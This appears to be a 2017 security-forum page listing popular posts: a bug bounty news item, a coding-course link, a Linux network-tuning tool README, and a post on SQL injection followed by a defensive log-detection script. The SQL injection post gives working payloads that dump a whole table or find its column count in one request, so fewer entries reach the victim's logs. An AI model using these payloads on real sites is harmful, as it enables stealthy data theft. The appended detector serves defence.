Leaderboard

Popular Content

Showing content with the highest reputation on 10/19/17 in all areas

  1. Google has finally launched a bug bounty program for Android apps on Google Play Store, inviting security researchers to find and report vulnerabilities in some of the most popular Android apps.

     Dubbed "Google Play Security Reward," the bug bounty program offers security researchers to work directly with Android app developers to find and fix vulnerabilities in their apps, for which Google will pay $1000 in rewards.

     "The goal of the program is to further improve app security which will benefit developers, Android users, and the entire Google Play ecosystem," the technology giant says in a blog post published today.

     Google has collaborated with bug bounty platform, HackerOne, to manage backend for this program, like submitting reports and inviting white-hat hackers and researchers.

     White-hat hackers who wish to participate can submit their findings directly to the app developers. Once the security vulnerability has been resolved, the hacker needs to submit his/her bug report to HackerOne.

     Google will then pay out a reward of $1,000 based on its Vulnerability Criteria, wherein, according to the company, more criteria may be added in the future, creating more scope for rewards.

     "All vulnerabilities must be reported directly to the app developer first. Only submit issues to the Play Security Rewards Program that have already been resolved by the developer," HackerOne said. "For now, the scope of this program is limited to RCE (remote-code-execution) vulnerabilities and corresponding POCs (Proof-of-concepts) that work on Android 4.4 devices and higher."

     It is an unfortunate truth that even after so many efforts by Google, malicious apps continuously somehow managed to fool its Play Store's security mechanism and infect millions of Android users.

     It's notable that Google Play Security Reward program does not include finding and reporting fake, adware or malware apps available on Google Play Store, so the program will not affect the increase in malicious apps on Google's app platform.

     For now, a limited number of Android apps have been added to Google Play Security Reward Program, including Alibaba, Snapchat, Duolingo, Line, Dropbox, Headspace, Mail.ru and Tinder.

     So what are you waiting for? Roll up your sleeves and start hunting for vulnerabilities. For more details about Google Play Security Reward Program, visit HackerOne.

     Source: https://thehackernews.com/2017/10/android-bug-bounty.html
    3 points
  2. https://wellcode.ro/ - Learn programming from scratch

     Start learning at your own pace. Create a free account and learn to write quality code. We'll be there to help you when you need it.

     Content: Introduction; C++ IDE; Tutorial for installing CodeBlocks; Hello world; Problem evaluation; Output; Variables; The data type for integers; Assigning values; Reading variables from the keyboard; Displaying variables; Operators; Addition; Calculation; Operators - II; Like; If - The decision structure; Structure of the if statement; Compound conditions; FizzBuzz; Chained if; Else; Maximum; Else if; Ascending 3; Comments; While - Repetition structure I; While - How it works; Case study - The number of digits of a number; ABC; Case study - concatenating two numbers; The reverse of a number; Chaining statements; Case study - Checking whether a number is prime; Triangle; For - Repetition structure II; Minimum and maximum of N numbers; Multiplication; The x-th prime number; Arrays of numbers; Accessing and modifying the elements of an array; Arrays of numbers - Reading and displaying; Modifying an array; Arrays of numbers - Case study - I; Adding an element to an array; Deleting an element from an array; Displaying the even elements in reverse order; Displaying even and odd elements; Sorting an array of numbers; Matrices - Two-dimensional arrays; Real-life applications; Reading and displaying matrices; Case study - the transpose of a matrix; Deleting a row from a matrix; Deleting a column from a matrix; Square matrices; Traversing the diagonals of a square matrix; Arrays of numbers - II; Frequency arrays; Binary search - Describing the idea; Binary search - implementation; Bubble sort; Counting sort

     https://wellcode.ro/

     Source: ProTV
    1 point
  3. https://i.imgur.com/772Ee2O.mp4
    1 point
  4. A suite of utilities simplifying linux networking stack performance troubleshooting and tuning.

     https://pypi.python.org/pypi/netutils-linux

     netutils-linux

     It's a useful utils to simplify Linux network troubleshooting and performance tuning, developed in order to help Carbon Reductor techsupport and automate the whole linux performance tuning process out of box (ok, except the best RSS layout detection with multiple network devices). These utils may be useful for datacenters and internet service providers with heavy network workload (you probably wouldn't see an effect at your desktop computer). It's now in production usage with 300+ deployment and save us a lot of time with hardware and software settings debugging. Inspired by packagecloud's blog post.

     Installation

     You'll need pip.

         pip install netutils-linux

     Utils

     Monitoring

     All these top-like utils don't require root privileges or sudo usage. So you can install and use them as non-privileged user if you care about security.

         pip install --user netutils-linux

     Brief explanation about highlighting colors for CPU and device groups: green and red are for NUMA-nodes, blue and yellow for CPU sockets. Screenshots are taken from different hosts with different hardware.

     network-top

     Most useful util in this repo that includes almost all linux network stack performance metrics and allow to monitor interrupts, soft interrupts, network processing statistic for devices and CPUs. Based on following files:

       - /proc/interrupts (vectors with small amount of irqs/second are hidden by default)
       - /proc/net/softnet_stat - packet distribution and errors/squeeze rate between CPUs.
       - /proc/softirqs (only NET_RX and NET_TX values).
       - /sys/class/net/<NET_DEVICE>/statistics/<METRIC> files (you can specify units, mbits are default)

     There are also separate utils if you want to look at only specific metrics: irqtop, softirq-top, softnet-stat-top, link-rate.

     snmptop

     Basic /proc/net/snmp file watcher.

     Tuning

     rss-ladder

     Automatically set smp_affinity_list for IRQ of NIC rx/tx queues (that usually work on CPU0 out of the box). Based on lscpu's output. It also supports double/quad ladder in case of multiprocessor systems (but you better explicitly specify queue count == core per socket as NIC's driver's param). Example output:

         # rss-ladder eth1 0
         - distributing interrupts of eth1 (-TxRx-) on socket 0
           - eth1: irq 67 eth1-TxRx-0 -> 0
           - eth1: irq 68 eth1-TxRx-1 -> 1
           - eth1: irq 69 eth1-TxRx-2 -> 2
           - eth1: irq 70 eth1-TxRx-3 -> 3
           - eth1: irq 71 eth1-TxRx-4 -> 8
           - eth1: irq 72 eth1-TxRx-5 -> 9
           - eth1: irq 73 eth1-TxRx-6 -> 10
           - eth1: irq 74 eth1-TxRx-7 -> 11

     autorps

     Enables RPS on all available CPUs of NUMA node local for the NIC for all NIC's rx queues. It may be good for small servers with cheap network cards. You also can explicitly pass --cpus or --cpu-mask. Example output:

         # autorps eth0
         Using mask 'fc0' for eth0-rx-0.

     maximize-cpu-freq

     Sets every CPU scaling governor mode to performance and set max scaling value for min scaling value. So you will be able to use all power of your processor (useful for latency sensible systems).

     rx-buffers-increase

     rx-buffers-increase utils, that finds and sets compromise-value between avoiding dropped/missing pkts and keeping a latency low. Example output:

         # ethtool -g eth1
         Ring parameters for eth1:
         Pre-set maximums:
         RX: 4096
         ...
         Current hardware settings:
         RX: 256

         # rx-buffers-increase eth1
         run: ethtool -G eth1 rx 2048

         # rx-buffers-increase eth1
         eth1's rx ring buffer already has fine size.

         # ethtool -g eth1
         Ring parameters for eth1:
         Pre-set maximums:
         RX: 4096
         ...
         Current hardware settings:
         RX: 2048

     Hardware and its configuration rating

     server-info

     Much alike lshw but designed for network processing role of server.

         # server-info show
         cpu:
           info:
             Architecture: x86_64
             BogoMIPS: 6799.9899999999998
             Byte Order: Little Endian
             CPU MHz: 3399.998
             CPU family: 6
             CPU op-mode(s): 32-bit, 64-bit
             CPU(s): 2
             Core(s) per socket: 1
             Hypervisor vendor: KVM
             L1d cache: 32K
             L1i cache: 32K
             L2 cache: 4096K
             Model: 13
             Model name: QEMU Virtual CPU version (cpu64-rhel6)
             NUMA node(s): 1
             NUMA node0 CPU(s): 0,1
             On-line CPU(s) list: 0,1
             Socket(s): 2
             Stepping: 3
             Thread(s) per core: 1
             Vendor ID: GenuineIntel
             Virtualization type: full
           layout:
             '0': '0'
             '1': '1'
         disk:
           sr0:
             model: QEMU DVD-ROM
           vda:
             model: null
             size: 64424509440
             type: HDD
         memory:
           MemFree: 158932
           MemTotal: 1922096
           SwapFree: 4128764
           SwapTotal: 4128764
         net:
           eth1:
             buffers:
               cur: 2048
               max: 4096
             conf:
               ip: 10.144.63.1/24
               vlan: true
             driver:
               driver: e1000
               version: 7.3.21-k8-NAPI
             queues:
               own: []
               rx: []
               rxtx: []
               shared:
               - virtio1, eth0, eth1
               tx: []
               unknown: []

     It also can rate hardware and its features in range of 1..10.

         # server-info rate
         cpu:
           BogoMIPS: 7
           CPU MHz: 7
           CPU(s): 1
           Core(s) per socket: 1
           L3 cache: 1
           Socket(s): 10
           Thread(s) per core: 10
           Vendor ID: 10
         disk:
           sr0:
             size: 1
             type: 2
           vda:
             size: 1
             type: 1
         memory:
           MemTotal: 1
           SwapTotal: 10
         net:
           eth1:
             buffers:
               cur: 5
               max: 10
             driver: 1
             queues: 1
         system:
           Hypervisor vendor: 1
           Virtualization type: 1

     Download: netutils-linux-master.zip

     or:

         git clone https://github.com/strizhechenko/netutils-linux.git

     Source: https://github.com/strizhechenko/netutils-linux
    1 point
  5. yes, we need it! when I clicked on your profile, you had an orgasm
    1 point
  6. For those interested: https://def.camp/become-a-volunteer/
    1 point
  7. 1 point
  8. By far the coolest: http://x.co/ZeusLinux
    1 point
  9. Since it's coming up soon, pinned!
    1 point
  10. Let me explain something: when Havij pulls data out of a table, it uses a syntax like

          select concat(coloana,coloana2,coloana3) from tabel limit X,1

      where X goes from 0 up to however many rows are in the table. Why do that when you can do this:

          (select @ from(select @:=0x00,(select 0 from tabel where @ in(@:=concat(@,coloana,coloana1,coloana2))))x)

      This way it pulls all the rows at once, and in the victim's logs, instead of 3000 requests (or however many rows there are), only a single request will appear.

      Havij does not make optimal use of the database errors. If the error You Have a error in your sintax appears in the page source, it will try to find the number of columns and will start doing:

          union select 1
          union select 1,2
          union select 1,2,3
          union select 1,2,3,4
          ...... etc.

      Why make so many requests when it can do:

          group by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100

      and from a single request an error like Unknow column '34' will appear in the source, let's say, which means there are 33 columns. 1 request vs 33 requests.
    1 point
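
The post above contrasts a request-per-row tool with single-request variants. From the defender's side, and as an added example that is not part of the original post, this detection sketch flags both shapes in web access logs, so alerting does not rely on request volume alone. The input format (client IP plus raw query string), the function names and the `min_run` threshold are assumptions; the sample entries are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

LIMIT_RE = re.compile(r"\blimit\s+(\d+)\s*,\s*1\b", re.I)
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\s+(\d+(?:\s*,\s*\d+)*)", re.I)
GROUP_RE = re.compile(r"\b(?:group|order)\s+by\s+\d+(?:\s*,\s*\d+){9,}", re.I)
ACCUM_RE = re.compile(r"@\s*:=\s*concat\s*\(\s*@", re.I)

def longest_run(values):
    """Length of the longest run of consecutive integers in values."""
    best, run, prev = 0, 0, None
    for v in sorted(values):
        run = run + 1 if prev is not None and v == prev + 1 else 1
        best, prev = max(best, run), v
    return best

def analyze(entries, min_run=3):
    """entries: (client_ip, raw_query_string) pairs. Returns {ip: [findings]}."""
    offsets, widths, found = defaultdict(set), defaultdict(set), defaultdict(set)
    for ip, raw in entries:
        q = re.sub(r"/\*.*?\*/", " ", unquote_plus(raw))  # decode, drop /**/ padding
        if m := LIMIT_RE.search(q):
            offsets[ip].add(int(m.group(1)))              # remember each row offset
        if m := UNION_RE.search(q):
            widths[ip].add(m.group(1).count(",") + 1)     # remember each column count
        if GROUP_RE.search(q):
            found[ip].add("column-count probe in one request (long GROUP BY list)")
        if ACCUM_RE.search(q):
            found[ip].add("whole-table dump in one request (@:=concat accumulator)")
    for ip, vals in offsets.items():                      # volume-based signals
        if longest_run(vals) >= min_run:
            found[ip].add("row-by-row dump (LIMIT n,1 sweep)")
    for ip, vals in widths.items():
        if longest_run(vals) >= min_run:
            found[ip].add("column-count probe (growing UNION SELECT)")
    return {ip: sorted(f) for ip, f in found.items()}

# Constructed sample entries (documentation IP ranges; tabel/coloana are the post's placeholders).
nums = lambda n: ",".join(map(str, range(1, n + 1)))
SAMPLE = [("198.51.100.7", f"id=1+union+select+{nums(n)}") for n in range(1, 5)]
SAMPLE += [("198.51.100.7", f"id=(select+concat(coloana)+from+tabel+limit+{x},1)") for x in range(4)]
SAMPLE += [("203.0.113.9", f"id=1+group+by+{nums(100)}"),
           ("203.0.113.9", "id=(select+%40+from(select+%40:=0x00,(select+0+from+tabel"
                           "+where+%40+in(%40:=concat(%40,coloana))))x)"),
           ("192.0.2.4", "page=2&sort=price&limit=10")]
if __name__ == "__main__":
    print(analyze(SAMPLE))
```

The second client sends only two requests in the sample, so a rate threshold would miss it; the content signatures on the decoded query string are what catch it.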